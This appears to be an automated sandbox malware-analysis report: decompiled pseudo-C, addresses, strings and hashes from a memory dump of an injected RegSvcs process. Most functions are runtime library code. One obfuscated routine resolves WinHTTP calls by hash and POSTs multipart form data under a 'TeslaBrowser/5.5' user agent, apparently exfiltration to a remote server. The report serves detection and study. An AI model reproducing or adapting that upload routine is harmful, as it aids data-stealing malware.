0x00401e17
0x00401e19
0x00000000
0x00000000
0x00000000
0x00401d44
0x00401d44
0x00401d46
0x00401d4b
0x00401d50
0x00401d52
0x00000000
0x00000000
0x00401d58
0x00401d5a
0x00401d5c
0x00401d5e
0x00401d5e
0x00401d5e
0x00401d60
0x00401e1f
0x00401e25
0x00401e2d
0x00401e2f
0x00000000
0x00000000
0x00401e35
0x00401e3b
0x00401e3c
0x00401e44
0x00401e45
0x00401e49
0x00401e49
0x00401e4b
0x00401e4b
0x00401e50
0x00401e6d
0x00401e6e
0x00401e76
0x00401e78
0x00401e7b
0x00401e83
0x00401e85
0x00000000
0x00000000
0x00401e8b
0x00401e8d
0x00401e8f
0x00401e91
0x00401e91
0x00401e91
0x00401e93
0x00401e95
0x00401e9a
0x00401e9f
0x00401ea1
0x00000000
0x00401ea7
0x00401ea7
0x00401ea9
0x00401eab
0x00401ead
0x00401ead
0x00401ead
0x00401eaf
0x00401eb3
0x00401eb7
0x00401eb9
0x00401ebb
0x00401ed9
0x00401ee6
0x00401ee8
0x00401eea
0x00401eeb
0x00401eef
0x00401ef3
0x00401ef8
0x00401efb
0x00401efd
0x00000000
0x00000000
0x00401f03
0x00401f05
0x00401f07
0x00401f09
0x00401f09
0x00401f09
0x00401f0b
0x00401f0d
0x00401f11
0x00401f31
0x00000000
0x00401f13
0x00401f13
0x00401f15
0x00401f1a
0x00401f1f
0x00401f21
0x00000000
0x00000000
0x00401f23
0x00401f25
0x00401f27
0x00401f27
0x00401f27
0x00401f29
0x00401f2d
0x00401f35
0x00401f35
0x00401f37
0x00401f61
0x00401f61
0x00401f62
0x00401f66
0x004020bf
0x004020bf
0x004020c1
0x00000000
0x004020c1
0x00000000
0x00401f66
0x00401f39
0x00401f3b
0x00401f40
0x00401f45
0x00401f47
0x00000000
0x00000000
0x00401f49
0x00401f4b
0x00401f4f
0x00401f51
0x00401f51
0x00401f51
0x00401f53
0x00401f55
0x00401f56
0x00401f5a
0x00000000
0x00401f5c
0x004020a0
0x004020a5
0x004020a7
0x004020a9
0x004020ae
0x004020b0
0x004020b5
0x00000000
0x00000000
0x004020b7
0x004020b9
0x004020bb
0x004020bb
0x004020bb
0x004020bd
0x004020bd
0x004020bd
0x00000000
0x004020a5
0x00401f5a
0x00401ebd
0x00401ebd
0x00401ebf
0x00401ec4
0x00401ec9
0x00401ecb
0x00000000
0x00000000
0x00401ed1
0x00401ed3
0x00401ed5
0x00401ed5
0x00401ed5
0x00401ed7
0x00401ed7
0x00000000
0x00401ed7
0x00401ebb
0x00401ea1
0x00401e52
0x00401e54
0x00401e58
0x00401e5d
0x00401e5f
0x00000000
0x00000000
0x00401e65
0x00401e67
0x00401e69
0x00401e69
0x00401e69
0x00401e6b
0x00401e6b
0x00000000
0x00401f6c
0x00401f71
0x00401f79
0x00401f7b
0x00401f7b
0x00000000
0x00401e4b
0x00000000
0x00401d70
0x00401d7d
0x00401d7f
0x00401d81
0x00401d86
0x00401d8b
0x00401d8d
0x00000000
0x00000000
0x00401d93
0x00401d95
0x00401d97
0x00401d99
0x00401d99
0x00401d99
0x00401d9b
0x00401d9f
0x00401da1
0x00401da4
0x00401da6
0x00401da9
0x00401dab
0x00401daf
0x00401db2
0x00401db6
0x00401f8b
0x00401f8d
0x00401f8f
0x00401f91
0x00000000
0x00000000
0x00000000
0x00401dbc
0x00401dbc
0x00401dbe
0x00401dc3
0x00401dc8
0x00401dca
0x00000000
0x00000000
0x00401dd0
0x00401dd2
0x00401dd4
0x00401dd6
0x00401dd6
0x00401dd6
0x00401dd8
0x00401ddc
0x00401f97
0x00401f9b
0x00401f9c
0x00401fa4
0x00401fa5
0x00401fa9
0x00401fa9
0x00401fa9
0x00401fab
0x00401fab
0x00401fab
0x00401fab
0x00401fad
0x00401fcc
0x00401fd0
0x00401fdd
0x00401fdf
0x00401fe1
0x00401fe2
0x00401fe6
0x00401fea
0x00401fef
0x00401ff2
0x00401ff4
0x00401f83
0x00401f85
0x00000000
0x00401f85
0x00401ff6
0x00401ff8
0x00401ffa
0x00401ffc
0x00401ffc
0x00401ffc
0x00401ffe
0x00402000
0x00402004
0x00402028
0x00000000
0x00402006
0x00402006
0x00402008
0x0040200d
0x00402012
0x00402014
0x00000000
0x00000000
0x0040201a
0x0040201c
0x0040201e
0x0040201e
0x0040201e
0x00402020
0x00402024
0x0040202c
0x0040202c
0x0040202e
0x00000000
0x00000000
0x00402030
0x00402032
0x00402037
0x0040203c
0x0040203e
0x00000000
0x00000000
0x00000000
0x0040203e
0x00402004
0x00401faf
0x00401fb1
0x00401fb5
0x00401fba
0x00401fbc
0x00401fc0
0x00000000
0x00000000
0x00401fc2
0x00401fc4
0x00401fc6
0x00401fc6
0x00401fc6
0x00401fc8
0x00000000
0x0040205f
0x0040205f
0x00402060
0x00402062
0x00402062
0x00402097
0x00402097
0x00402099
0x004020c6
0x004020c6
0x004020cb
0x004020cd
0x004020d2
0x004020d4
0x004020d4
0x004020d6
0x004020d6
0x00000000
0x00402044
0x00402044
0x00402046
0x00402048
0x0040204a
0x0040204a
0x0040204a
0x0040204c
0x00402050
0x00402052
0x00402053
0x00402053
0x0040206e
0x00402073
0x00402095
0x00402075
0x00402075
0x00402077
0x0040207b
0x00402080
0x00402082
0x00402087
0x00000000
0x00000000
0x00402089
0x0040208b
0x0040208d
0x0040208f
0x0040208f
0x0040208f
0x00402091
0x00402091
0x00000000
0x00402073
0x00000000
0x00401de4
0x00401dec
0x00401dee
0x00401df0
0x00401df9
0x00401df2
0x00401df2
0x00401df2
0x00401dfe
0x00401dfe
0x00401e03
0x00401e05
0x00000000
0x00401e0d
0x004020e1
0x00000000

APIs

_strlen.LIBCMT ref: 00401E6E

Strings

null, xrefs: 00401C7C
true, xrefs: 00401DF2
false, xrefs: 00401DF9
%1.17g, xrefs: 00401CC9
[,]{: }, xrefs: 00401D81

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: _strlen
String ID: %1.17g$[,]{: }$false$null$true
API String ID: 4218353326-762322047
Opcode ID: f9d3f2687fad59b661e46191c9d7cf30b046d363118c199ac2fec7b838b7555c
Instruction ID: e69153010fc206c56059fb9801d2f5e2131bf05203770bd054af21e2885b7985
Opcode Fuzzy Hash: f9d3f2687fad59b661e46191c9d7cf30b046d363118c199ac2fec7b838b7555c
Instruction Fuzzy Hash: E5C1E172B047025BD311662A895063FB6D69FD0344F19853FED0AE33E6EB7DDC06829A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1B8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 193
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041C1B8(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v96;
				intOrPtr _v108;
				char _v116;
				intOrPtr _v128;
				char _v140;
				intOrPtr _v144;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t30;
				intOrPtr* _t33;
				intOrPtr* _t36;
				intOrPtr* _t39;
				WCHAR* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t47;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr* _t51;
				void* _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr _t56;
				intOrPtr _t58;
				intOrPtr* _t63;
				void* _t65;
				void* _t74;

				_t64 = L"winhttp.dll";
				_t30 = E0042EEA4(0xf9f57cf0, L"winhttp.dll");
				_v68 =  *_t30(L"TeslaBrowser/5.5", 0, 0, 0, 0);
				_v64 = _v68;
				_t33 = E0042EEA4(0x406457c2, _t64);
				_v76 =  *_t33(_v64, _a4, 0x50, 0);
				_v72 = _v76;
				_t36 = E0042EEA4(0x507048c2, _t64);
				_v96 =  *_t36(_v72, L"POST", _a8, 0, 0, 0, 0);
				_v116 = _v96;
				_t39 = E0042EEA4(0xe268a0c1, _t64);
				 *_t39(_v116, 0x493e0, 0x493e0, 0x493e0, 0x493e0);
				_t41 = E0043EBC9();
				wsprintfW(_t41, L"Content-Type: multipart/form-data; boundary=%s\r\n", L"SqDe87817huf871793q74");
				_t43 = E0042EEA4(0xab3372e8, _t64);
				 *_t43(_v128, _t41, 0xffffffff, 0x20000000, 0x96, 1);
				_t45 = E0042EEA4(0xb72f0de, _t64);
				_t56 = _v76;
				 *_t45(_v144, 0, 0, 0, 0, _t56, 0);
				_t63 =  &_v140;
				 *_t63 = 0;
				_t47 = E0042EEA4(0x59886bc0, _t64);
				_t74 = _t65 + 0x4c;
				_v160 =  *_t47(_v172, _v108, _t56, _t63);
				_v164 = 0x8d258765;
				_t58 = 0x8d258765;
				do {
					L1:
					while(1) {
						if(_t58 <= 0x4e3c75c) {
							if(_t58 > 0x93cf269c) {
								if(_t58 == 0x93cf269d) {
									_t58 = 0xde8e84b0;
									if(_v184 != 0) {
										_t58 = 0x76ea4b01;
									}
								} else {
									if(_t58 == 0xde8e84b0) {
										_t58 = 0x836d38f8;
										if(_v176 != 0) {
											_t58 = 0x64817735;
										}
									}
								}
							} else {
								if(_t58 == 0x836d38f8) {
									_t58 = 0x621dc788;
									if(_v168 != 0) {
										_t58 = 0x5ccaafd4;
									}
								} else {
									if(_t58 == 0x8d258765) {
										_t58 = 0x621dc788;
										if(_v160 != 0) {
											_t58 = 0x4e3c75d;
										}
									}
								}
							}
							continue;
						}
						break;
					}
					if(_t58 <= 0x621dc787) {
						if(_t58 == 0x4e3c75d) {
							_t49 = E0042EEA4(0x76b029a, L"winhttp.dll");
							_t74 = _t74 + 8;
							_t50 =  *_t49(_v188, 0);
							_t58 = 0x621dc788;
							if(_t50 != 0) {
								_t58 = 0x93cf269d;
							}
						} else {
							if(_t58 == 0x5ccaafd4) {
								_t54 = E0042EEA4(0x7aa0edcc, L"winhttp.dll");
								_t74 = _t74 + 8;
								_t52 =  *_t54(_v188);
								_t58 = 0x621dc788;
							}
						}
						continue;
					}
					if(_t58 == 0x64817735) {
						_t51 = E0042EEA4(0x7aa0edcc, L"winhttp.dll");
						_t74 = _t74 + 8;
						_t52 =  *_t51(_v172);
						_t58 = 0x836d38f8;
						continue;
					}
					if(_t58 == 0x76ea4b01) {
						_t53 = E0042EEA4(0x7aa0edcc, L"winhttp.dll");
						_t74 = _t74 + 8;
						_t52 =  *_t53(_v180);
						_t58 = 0xde8e84b0;
						continue;
					}
				} while (_t58 != 0x621dc788);
				_v164 = _t58;
				return _t52;
			}

0x0041c1c7
0x0041c1d2
0x0041c1e7
0x0041c1ef
0x0041c1f9
0x0041c20b
0x0041c213
0x0041c21d
0x0041c235
0x0041c23d
0x0041c246
0x0041c25b
0x0041c264
0x0041c279
0x0041c288
0x0041c29c
0x0041c2a4
0x0041c2ad
0x0041c2ba
0x0041c2bc
0x0041c2c0
0x0041c2c8
0x0041c2cd
0x0041c2dc
0x0041c2e0
0x0041c2e8
0x0041c2ed
0x00000000
0x0041c2ed
0x0041c2f3
0x0041c33a
0x0041c3a2
0x0041c440
0x0041c445
0x0041c44b
0x0041c44b
0x0041c3a8
0x0041c3ae
0x0041c3b9
0x0041c3be
0x0041c3c4
0x0041c3c4
0x0041c3be
0x0041c3ae
0x0041c33c
0x0041c342
0x0041c3f5
0x0041c3fa
0x0041c400
0x0041c400
0x0041c348
0x0041c34e
0x0041c355
0x0041c35a
0x0041c35c
0x0041c35c
0x0041c35a
0x0041c34e
0x0041c342
0x00000000
0x0041c33a
0x00000000
0x0041c2f3
0x0041c2fb
0x0041c369
0x0041c414
0x0041c419
0x0041c422
0x0041c424
0x0041c42b
0x0041c431
0x0041c431
0x0041c36f
0x0041c375
0x0041c385
0x0041c38a
0x0041c390
0x0041c392
0x0041c392
0x0041c375
0x00000000
0x0041c369
0x0041c303
0x0041c3d8
0x0041c3dd
0x0041c3e4
0x0041c3e6
0x00000000
0x0041c3e6
0x0041c30f
0x0041c31f
0x0041c324
0x0041c32b
0x0041c32d
0x00000000
0x0041c32d
0x0041c455
0x0041c461
0x0041c46c

APIs

wsprintfW.USER32 ref: 0041C279

Strings

POST, xrefs: 0041C22A
winhttp.dll, xrefs: 0041C1C7, 0041C1CC, 0041C1F3, 0041C217, 0041C240, 0041C282, 0041C29E, 0041C2C2, 0041C315, 0041C37B, 0041C3CE, 0041C40A
TeslaBrowser/5.5, xrefs: 0041C1E0
Content-Type: multipart/form-data; boundary=%s, xrefs: 0041C273
SqDe87817huf871793q74, xrefs: 0041C26E

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: wsprintf
String ID: Content-Type: multipart/form-data; boundary=%s$POST$SqDe87817huf871793q74$TeslaBrowser/5.5$winhttp.dll
API String ID: 2111968516-3125352522
Opcode ID: f13d718f6a9c294073d4bf83fa5498d1c813d2fbcb715cabf587564f46ec9eba
Instruction ID: 26df0bf988023aa52eac8cb4a32c1c30d0d2fed4005ee5ace28df849d2155ca7
Opcode Fuzzy Hash: f13d718f6a9c294073d4bf83fa5498d1c813d2fbcb715cabf587564f46ec9eba
Instruction Fuzzy Hash: 7D519730A88300BBD6245A568C96E6F7BA4DFC2B0AF10452FFD15A2390D63E5C84D66B

Uniqueness

Uniqueness Score: -1.00%

Function 004443D5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004443D5(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x461340 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x4596c8 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x461340 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x461340 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E00448B8E(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E00448B8E(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}

0x004443de
0x00444473
0x004443e6
0x004443e8
0x004443f2
0x004443f7
0x00444404
0x00444419
0x0044441d
0x00444483
0x00444488
0x0044448f
0x00444493
0x00444496
0x00444496
0x0044449c
0x0044449c
0x0044447e
0x00444482
0x00444482
0x0044441f
0x00444428
0x00444461
0x0044446e
0x00444470
0x00444470
0x00000000
0x00444470
0x00444432
0x00444437
0x0044443c
0x00000000
0x00000000
0x00444446
0x0044444b
0x00444450
0x00000000
0x00000000
0x00444455
0x0044445b
0x0044445f
0x00000000
0x00000000
0x00000000
0x0044445f
0x004443fc
0x00000000
0x00000000
0x00000000
0x00444402
0x0044447c
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,004444E2,00003F56,000060DE,?,00000000,00000000,?,00444296,00000021,FlsSetValue,00459CCC,FlsSetValue,?), ref: 00444496

Strings

api-ms-, xrefs: 0044442C
ext-ms-, xrefs: 00444440

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 64f4905e8eb311700e558ce9afbdb97e29936a39eaa341490b0cc7949938334f
Instruction ID: bd42ee661510ec0f3fb54382099595539fe6f6af8f7f8671147c1abc9926d37c
Opcode Fuzzy Hash: 64f4905e8eb311700e558ce9afbdb97e29936a39eaa341490b0cc7949938334f
Instruction Fuzzy Hash: 7521D871E01311ABFB219BA4AC41B9B3768EF91775B240126EC06A7391DB78ED01C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 00449E5E Relevance: 9.3, APIs: 6, Instructions: 298
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E00449E5E(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				signed int _v12;
				void* _v16;
				signed int _v20;
				long _v24;
				void* _v28;
				char _v32;
				void* _v36;
				long _v40;
				signed int* _t132;
				signed int _t134;
				signed int _t135;
				long _t138;
				signed int _t141;
				signed int _t143;
				signed char _t145;
				intOrPtr _t153;
				long _t155;
				signed int _t156;
				signed int _t157;
				signed int _t159;
				long _t160;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t168;
				signed int _t170;
				signed int _t172;
				char _t174;
				char _t179;
				char _t184;
				signed char _t191;
				long _t197;
				signed int _t200;
				intOrPtr _t203;
				long _t204;
				signed int _t205;
				unsigned int _t208;
				signed int _t210;
				signed int _t216;
				signed char _t217;
				long _t218;
				long _t219;
				void* _t220;
				signed int _t221;
				char* _t223;
				char* _t224;
				char* _t225;
				signed int _t230;
				signed int _t231;
				void* _t235;
				void* _t237;
				void* _t238;
				void* _t239;

				_t200 = _a4;
				_t238 = _t237 - 0x24;
				if(_t200 != 0xfffffffe) {
					__eflags = _t200;
					if(_t200 < 0) {
						L60:
						_t132 = E0043C339();
						 *_t132 =  *_t132 & 0x00000000;
						__eflags =  *_t132;
						 *((intOrPtr*)(E0043C326())) = 9;
						L61:
						_t134 = E004457B7();
						goto L62;
					}
					__eflags = _t200 -  *0x461770; // 0x40
					if(__eflags >= 0) {
						goto L60;
					}
					_t216 = _t200 >> 6;
					_t230 = (_t200 & 0x0000003f) * 0x38;
					_v12 = _t216;
					_v32 = 1;
					_t138 =  *((intOrPtr*)(0x461570 + _t216 * 4));
					_v24 = _t138;
					_v20 = _t230;
					_t217 =  *((intOrPtr*)(_t138 + _t230 + 0x28));
					_v5 = _t217;
					__eflags = 1 & _t217;
					if((1 & _t217) == 0) {
						goto L60;
					}
					_t218 = _a12;
					__eflags = _t218 - 0x7fffffff;
					if(_t218 <= 0x7fffffff) {
						__eflags = _t218;
						if(_t218 == 0) {
							L59:
							_t135 = 0;
							goto L63;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L59;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t141 =  *((intOrPtr*)(_t138 + _t230 + 0x29));
						_v5 = _t141;
						_v28 =  *((intOrPtr*)(_t138 + _t230 + 0x18));
						_t235 = 0;
						_t143 = _t141 - 1;
						__eflags = _t143;
						if(_t143 == 0) {
							_t145 =  !_t218;
							__eflags = 1 & _t145;
							if((1 & _t145) == 0) {
								L14:
								 *(E0043C339()) =  *_t146 & _t235;
								 *((intOrPtr*)(E0043C326())) = 0x16;
								E004457B7();
								goto L40;
							} else {
								_t219 = _t218 >> 1;
								_t197 = 4;
								__eflags = _t219 - 1;
								if(_t219 >= 1) {
									_t197 = _t219;
								}
								_t235 = E0044602F(_t197);
								E004456E4(0);
								E004456E4(0);
								_t239 = _t238 + 0xc;
								_v16 = _t235;
								__eflags = _t235;
								if(_t235 != 0) {
									_t153 = E0044837A(_t219, _a4, 0, 0, 1);
									_t238 = _t239 + 0x10;
									_t203 =  *((intOrPtr*)(0x461570 + _v12 * 4));
									 *((intOrPtr*)(_t230 + _t203 + 0x20)) = _t153;
									 *(_t230 + _t203 + 0x24) = _t219;
									_t220 = _t235;
									_t155 =  *((intOrPtr*)(0x461570 + _v12 * 4));
									L22:
									_v24 = _t155;
									L23:
									_t204 = _v24;
									_t230 = 0;
									_t156 = _v20;
									_v36 = _t220;
									__eflags =  *(_t156 + _t204 + 0x28) & 0x00000048;
									_t205 = _a4;
									if(( *(_t156 + _t204 + 0x28) & 0x00000048) != 0) {
										_t56 = _v24 + 0x2a; // 0x10c483c2
										_t174 =  *((intOrPtr*)(_t156 + _t56));
										_t223 = _v16;
										__eflags = _t174 - 0xa;
										if(_t174 != 0xa) {
											__eflags = _t197;
											if(_t197 != 0) {
												_t230 = 1;
												 *_t223 = _t174;
												_t224 = _t223 + 1;
												_t197 = _t197 - 1;
												__eflags = _v5;
												_v16 = _t224;
												 *((char*)(_v20 +  *((intOrPtr*)(0x461570 + _v12 * 4)) + 0x2a)) = 0xa;
												_t205 = _a4;
												if(_v5 != 0) {
													_t72 =  *((intOrPtr*)(0x461570 + _v12 * 4)) + 0x2b; // 0x8310c483
													_t179 =  *((intOrPtr*)(_v20 + _t72));
													_t205 = _a4;
													__eflags = _t179 - 0xa;
													if(_t179 != 0xa) {
														__eflags = _t197;
														if(_t197 != 0) {
															 *_t224 = _t179;
															_t225 = _t224 + 1;
															_t197 = _t197 - 1;
															__eflags = _v5 - 1;
															_v16 = _t225;
															_t230 = 2;
															 *((char*)(_v20 +  *((intOrPtr*)(0x461570 + _v12 * 4)) + 0x2b)) = 0xa;
															_t205 = _a4;
															if(_v5 == 1) {
																_t88 =  *((intOrPtr*)(0x461570 + _v12 * 4)) + 0x2c; // 0xf88310c4
																_t184 =  *((intOrPtr*)(_v20 + _t88));
																_t205 = _a4;
																__eflags = _t184 - 0xa;
																if(_t184 != 0xa) {
																	__eflags = _t197;
																	if(_t197 != 0) {
																		 *_t225 = _t184;
																		_t197 = _t197 - 1;
																		__eflags = _t197;
																		_v16 = _t225 + 1;
																		_t230 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x461570 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t157 = E0044EC31(_t205);
									__eflags = _t157;
									if(_t157 == 0) {
										L43:
										_v32 = 0;
										L44:
										_t198 = _v16;
										_t159 = ReadFile(_v28, _v16, _t197,  &_v24, 0);
										__eflags = _t159;
										if(_t159 == 0) {
											L55:
											_t160 = GetLastError();
											_t230 = 5;
											__eflags = _t160 - _t230;
											if(_t160 != _t230) {
												__eflags = _t160 - 0x6d;
												if(_t160 != 0x6d) {
													L39:
													E0043C34C(_t160);
													goto L40;
												}
												_t231 = 0;
												goto L41;
											}
											 *((intOrPtr*)(E0043C326())) = 9;
											 *(E0043C339()) = _t230;
											goto L40;
										}
										_t208 = _a12;
										__eflags = _v24 - _t208;
										if(_v24 > _t208) {
											goto L55;
										}
										_t231 = _t230 + _v24;
										__eflags = _t231;
										L47:
										_t221 = _v20;
										_t165 =  *((intOrPtr*)(0x461570 + _v12 * 4));
										__eflags =  *((char*)(_t221 + _t165 + 0x28));
										if( *((char*)(_t221 + _t165 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v32;
												_push(_t231 >> 1);
												_push(_v36);
												_push(_a4);
												if(_v32 == 0) {
													_t166 = E0044A51B();
												} else {
													_t166 = E0044A1FD();
												}
											} else {
												_t209 = _t208 >> 1;
												__eflags = _t208 >> 1;
												_t166 = E0044A278(_t208 >> 1, _t208 >> 1, _a4, _t198, _t231, _a8, _t209);
											}
											_t231 = _t166;
										}
										goto L41;
									}
									_t210 = _v20;
									_t168 =  *((intOrPtr*)(0x461570 + _v12 * 4));
									__eflags =  *((char*)(_t210 + _t168 + 0x28));
									if( *((char*)(_t210 + _t168 + 0x28)) >= 0) {
										goto L43;
									}
									_t170 = GetConsoleMode(_v28,  &_v40);
									__eflags = _t170;
									if(_t170 == 0) {
										goto L43;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L44;
									}
									_t198 = _v16;
									_t172 = ReadConsoleW(_v28, _v16, _t197 >> 1,  &_v24, 0);
									__eflags = _t172;
									if(_t172 != 0) {
										_t208 = _a12;
										_t231 = _t230 + _v24 * 2;
										goto L47;
									}
									_t160 = GetLastError();
									goto L39;
								} else {
									 *((intOrPtr*)(E0043C326())) = 0xc;
									 *(E0043C339()) = 8;
									L40:
									_t231 = _t230 | 0xffffffff;
									__eflags = _t231;
									L41:
									E004456E4(_t235);
									_t135 = _t231;
									goto L63;
								}
							}
						}
						__eflags = _t143 == 1;
						if(_t143 == 1) {
							_t191 =  !_t218;
							__eflags = 1 & _t191;
							if((1 & _t191) != 0) {
								_t155 = _v24;
								_t197 = _t218;
								_t220 = _a8;
								_v16 = _t220;
								goto L22;
							}
							goto L14;
						} else {
							_t197 = _t218;
							_t220 = _a8;
							_v16 = _t220;
							goto L23;
						}
					}
					L6:
					 *(E0043C339()) =  *_t139 & 0x00000000;
					 *((intOrPtr*)(E0043C326())) = 0x16;
					goto L61;
				} else {
					 *(E0043C339()) =  *_t192 & 0x00000000;
					_t134 = E0043C326();
					 *_t134 = 9;
					L62:
					_t135 = _t134 | 0xffffffff;
					L63:
					return _t135;
				}
			}

0x00449e63
0x00449e66
0x00449e6e
0x00449e88
0x00449e8a
0x0044a1de
0x0044a1de
0x0044a1e3
0x0044a1e3
0x0044a1eb
0x0044a1f1
0x0044a1f1
0x00000000
0x0044a1f1
0x00449e90
0x00449e96
0x00000000
0x00000000
0x00449ea0
0x00449ea6
0x00449eab
0x00449eaf
0x00449eb2
0x00449eb9
0x00449ebc
0x00449ebf
0x00449ec3
0x00449ec6
0x00449ec8
0x00000000
0x00000000
0x00449ece
0x00449ed1
0x00449ed7
0x00449ef1
0x00449ef3
0x0044a1da
0x0044a1da
0x00000000
0x0044a1da
0x00449ef9
0x00449efd
0x00000000
0x00000000
0x00449f03
0x00449f07
0x00000000
0x00000000
0x00449f0e
0x00449f12
0x00449f15
0x00449f18
0x00449f1d
0x00449f1d
0x00449f20
0x00449f67
0x00449f69
0x00449f6b
0x00449f3c
0x00449f41
0x00449f48
0x00449f4e
0x00000000
0x00449f6d
0x00449f6f
0x00449f71
0x00449f72
0x00449f74
0x00449f76
0x00449f76
0x00449f80
0x00449f82
0x00449f89
0x00449f8e
0x00449f91
0x00449f94
0x00449f96
0x00449fbc
0x00449fc4
0x00449fc7
0x00449fce
0x00449fd5
0x00449fd9
0x00449fdb
0x00449fe2
0x00449fe2
0x00449fe5
0x00449fe5
0x00449fe8
0x00449fea
0x00449fed
0x00449ff0
0x00449ff5
0x00449ff8
0x0044a001
0x0044a001
0x0044a005
0x0044a008
0x0044a00a
0x0044a010
0x0044a012
0x0044a01b
0x0044a01c
0x0044a01e
0x0044a022
0x0044a023
0x0044a027
0x0044a031
0x0044a036
0x0044a039
0x0044a048
0x0044a048
0x0044a04c
0x0044a04f
0x0044a051
0x0044a053
0x0044a055
0x0044a05a
0x0044a05c
0x0044a060
0x0044a061
0x0044a067
0x0044a071
0x0044a072
0x0044a077
0x0044a07a
0x0044a089
0x0044a089
0x0044a08d
0x0044a090
0x0044a092
0x0044a094
0x0044a096
0x0044a098
0x0044a09e
0x0044a09e
0x0044a09f
0x0044a0ae
0x0044a0af
0x0044a0af
0x0044a096
0x0044a092
0x0044a07a
0x0044a055
0x0044a051
0x0044a039
0x0044a012
0x0044a00a
0x0044a0b5
0x0044a0bb
0x0044a0bd
0x0044a12e
0x0044a12e
0x0044a132
0x0044a139
0x0044a140
0x0044a146
0x0044a148
0x0044a1a6
0x0044a1a6
0x0044a1ae
0x0044a1af
0x0044a1b1
0x0044a1ca
0x0044a1cd
0x0044a10a
0x0044a10b
0x00000000
0x0044a110
0x0044a1d3
0x00000000
0x0044a1d3
0x0044a1b8
0x0044a1c3
0x00000000
0x0044a1c3
0x0044a14a
0x0044a14d
0x0044a150
0x00000000
0x00000000
0x0044a152
0x0044a152
0x0044a155
0x0044a158
0x0044a15b
0x0044a162
0x0044a167
0x0044a169
0x0044a16d
0x0044a188
0x0044a18c
0x0044a18d
0x0044a190
0x0044a193
0x0044a19f
0x0044a195
0x0044a195
0x0044a195
0x0044a16f
0x0044a16f
0x0044a16f
0x0044a17a
0x0044a17f
0x0044a182
0x0044a182
0x00000000
0x0044a167
0x0044a0c2
0x0044a0c5
0x0044a0cc
0x0044a0d1
0x00000000
0x00000000
0x0044a0da
0x0044a0e0
0x0044a0e2
0x00000000
0x00000000
0x0044a0e4
0x0044a0e8
0x00000000
0x00000000
0x0044a0f3
0x0044a0fa
0x0044a100
0x0044a102
0x0044a126
0x0044a129
0x00000000
0x0044a129
0x0044a104
0x00000000
0x00449f98
0x00449f9d
0x00449fa8
0x0044a111
0x0044a111
0x0044a111
0x0044a114
0x0044a115
0x0044a11b
0x00000000
0x0044a11d
0x00449f96
0x00449f6b
0x00449f22
0x00449f25
0x00449f36
0x00449f38
0x00449f3a
0x00449f58
0x00449f5b
0x00449f5d
0x00449f60
0x00000000
0x00449f60
0x00000000
0x00449f27
0x00449f27
0x00449f29
0x00449f2c
0x00000000
0x00449f2c
0x00449f25
0x00449ed9
0x00449ede
0x00449ee6
0x00000000
0x00449e70
0x00449e75
0x00449e78
0x00449e7d
0x0044a1f6
0x0044a1f6
0x0044a1f9
